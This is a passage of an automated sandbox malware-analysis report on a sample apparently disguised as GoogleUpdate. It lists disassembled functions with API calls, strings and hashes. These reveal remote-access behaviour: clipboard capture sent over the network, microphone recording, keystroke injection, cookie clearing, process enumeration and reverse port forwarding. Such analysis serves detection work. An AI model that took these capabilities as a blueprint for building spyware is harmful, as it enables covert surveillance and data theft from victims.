Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68

Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
Opcode Fuzzy Hash: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B

Function 00452DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
__dosmaperr.LIBCMT ref: 00452ED6
GetFileType.KERNEL32(00000000), ref: 00452EE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
__dosmaperr.LIBCMT ref: 00452EF5
CloseHandle.KERNEL32(00000000), ref: 00452F15
CloseHandle.KERNEL32(00000000), ref: 0045305F
GetLastError.KERNEL32 ref: 00453091
__dosmaperr.LIBCMT ref: 00453098

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A

Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0045100F
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
__alloca_probe_16.LIBCMT ref: 004510CA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
__alloca_probe_16.LIBCMT ref: 00451174
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
__freea.LIBCMT ref: 004511E3
__freea.LIBCMT ref: 004511EF

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 99543cff2907c0b4d34c425deaa11b1fb650b3a063013b5d40be1c299c57468c
Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
Opcode Fuzzy Hash: 99543cff2907c0b4d34c425deaa11b1fb650b3a063013b5d40be1c299c57468c
Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768

Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_memcmp.LIBVCRUNTIME ref: 00442935
_free.LIBCMT ref: 004429A6
_free.LIBCMT ref: 004429BF
_free.LIBCMT ref: 004429F1
_free.LIBCMT ref: 004429FA
_free.LIBCMT ref: 00442A06

Strings

C, xrefs: 004427F3

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 7566827e2ed3776f8e8568dfe657035855bda713ddddf546254e360ae98071d6
Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
Opcode Fuzzy Hash: 7566827e2ed3776f8e8568dfe657035855bda713ddddf546254e360ae98071d6
Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44

Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 004134C9
udp, xrefs: 0041349C

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A

Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040FF79
inet_ntoa.WS2_32(?), ref: 00410014

Strings

StopForward, xrefs: 004100F5
StartReverse, xrefs: 004100E4
StopReverse, xrefs: 00410106
StartForward, xrefs: 004100D8
GetDirectListeningPort, xrefs: 00410117

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 4b0beb5895bf1fb6b761f05e44acef174742dea3257a1ebbcb6f0cf86ef9a86b
Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
Opcode Fuzzy Hash: 4b0beb5895bf1fb6b761f05e44acef174742dea3257a1ebbcb6f0cf86ef9a86b
Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF

Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36

Strings

.part, xrefs: 00406A1A

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritesend
String ID: .part
API String ID: 2057882627-3499674018
Opcode ID: 551b5476aa36853213c23cbc2aeafcd89144a5186fc3414e6e1c0fd1deb8704e
Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
Opcode Fuzzy Hash: 551b5476aa36853213c23cbc2aeafcd89144a5186fc3414e6e1c0fd1deb8704e
Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A

Function 0040AE2A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
PathFileExistsA.SHLWAPI(?), ref: 0040AEB9

Strings

[IE cookies cleared!], xrefs: 0040AF06, 0040AF2B
P0F, xrefs: 0040AE6B
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040AE43
Cookies, xrefs: 0040AE3E
[IE cookies not found], xrefs: 0040AE81

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P0F$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-1451598199
Opcode ID: 7d35b34a5c32c4cacedef9e57bb3c67f877bb4cbe8c78781d2c4aa2971c17524
Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
Opcode Fuzzy Hash: 7d35b34a5c32c4cacedef9e57bb3c67f877bb4cbe8c78781d2c4aa2971c17524
Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA

Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
__alloca_probe_16.LIBCMT ref: 00447056
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
__alloca_probe_16.LIBCMT ref: 0044713B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
__freea.LIBCMT ref: 004471AB

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

__freea.LIBCMT ref: 004471B4
__freea.LIBCMT ref: 004471D9

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
Opcode Fuzzy Hash: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8

Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7

Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414F41
EmptyClipboard.USER32 ref: 00414F4F
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: 158d6fabbfdad93997b53c9794d9e51bddfba0ba71ac78c7de7087ddbe2f659e
Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
Opcode Fuzzy Hash: 158d6fabbfdad93997b53c9794d9e51bddfba0ba71ac78c7de7087ddbe2f659e
Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A

Function 0041A47D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 0041A47F
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
RegCloseKey.ADVAPI32(?), ref: 0041A749

Strings

DisplayName, xrefs: 0041A4C6

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName
API String ID: 1332880857-3786665039
Opcode ID: 4d6256ca6c3ac919f3f8d4cba605b6823c2372603dcb2b171f06ea34bc636a85
Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
Opcode Fuzzy Hash: 4d6256ca6c3ac919f3f8d4cba605b6823c2372603dcb2b171f06ea34bc636a85
Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A

Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
__fassign.LIBCMT ref: 00447814
__fassign.LIBCMT ref: 0044782F
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69

Function 0040E2E7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
CloseHandle.KERNEL32(00000000), ref: 0040E4EF

Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
Part of subcall function 00419F51: IsWow64Process.KERNEL32(00000000,?,?,?,00000001), ref: 00419F71

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0

Strings

XAF, xrefs: 0040E346

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$Process32$NextOpenWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID: XAF
API String ID: 44284711-3946003707
Opcode ID: 7f2cca916bbd420c66316d83435137cae89fcba16a13fcadf5b2299afb6f7b4b
Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
Opcode Fuzzy Hash: 7f2cca916bbd420c66316d83435137cae89fcba16a13fcadf5b2299afb6f7b4b
Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A

Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D30

Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9

waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F

Strings

.wav, xrefs: 00401D49
%Y-%m-%d %H.%M, xrefs: 00401D21

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 56e85467894a34748c48d0f1eb6f7913f46ef2942ef546941b50b0fa89a5bbba
